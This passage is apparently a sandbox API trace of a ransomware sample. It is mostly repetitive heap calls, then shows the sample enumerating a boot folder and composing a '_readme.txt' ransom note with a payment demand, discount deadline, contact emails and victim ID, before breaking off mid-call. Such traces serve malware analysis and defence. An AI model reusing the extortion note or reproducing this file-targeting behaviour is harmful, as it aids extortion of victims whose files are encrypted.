lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.490] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.490] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.490] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.490] PathFindFileNameW (pszPath="") returned="" [0201.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.490] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.491] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.491] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.491] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.491] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0201.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.492] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0201.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.492] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.498] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.498] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.498] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.498] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.498] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.499] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0201.499] CreateFileW 